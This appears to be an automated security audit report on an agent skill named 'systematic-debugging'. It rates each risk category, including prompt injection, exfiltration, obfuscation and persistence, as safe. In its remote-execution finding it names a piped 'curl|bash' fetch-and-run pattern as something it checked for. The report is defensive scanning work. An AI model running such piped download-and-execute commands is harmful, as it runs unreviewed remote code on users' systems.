systematic-debugging
Pass
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: SAFE
Full Analysis
- [Prompt Injection] (SAFE): No instructions attempting to override agent behavior, bypass safety filters, or extract system prompts were detected. The content consists of natural pedagogical instructions.
- [Data Exposure & Exfiltration] (SAFE): No hardcoded credentials, sensitive file path access, or unauthorized network operations were identified. Mentions of 127.0.0.1 are standard for local development configurations.
- [Obfuscation] (SAFE): No Base64 encoding, zero-width characters, homoglyphs, or other obfuscation techniques were found.
- [Unverifiable Dependencies & Remote Code Execution] (SAFE): The skill references standard industry tools (pytest, django-debug-toolbar, ruff, pyright). No remote script execution or piped command patterns (e.g., curl|bash) are present.
- [Privilege Escalation] (SAFE): No usage of sudo, administrative escalation, or unsafe permission modifications were detected.
- [Persistence Mechanisms] (SAFE): The skill does not attempt to modify shell profiles, cron jobs, or system services.
- [Metadata Poisoning] (SAFE): Metadata fields (name, description) accurately reflect the skill's functionality and contain no hidden instructions.
- [Indirect Prompt Injection] (SAFE): The skill processes Django request data for debugging purposes. While this is an ingestion surface, the provided snippets for logging and inspection are standard and do not include unsafe interpolation into LLM prompts.
- [Time-Delayed / Conditional Attacks] (SAFE): No logic gating behavior based on time, date, or environment-specific triggers was found.
- [Dynamic Execution] (SAFE): No use of eval(), exec(), or runtime code compilation. The use of Python's native breakpoint() is appropriate for the skill's primary purpose of debugging.
Audit Metadata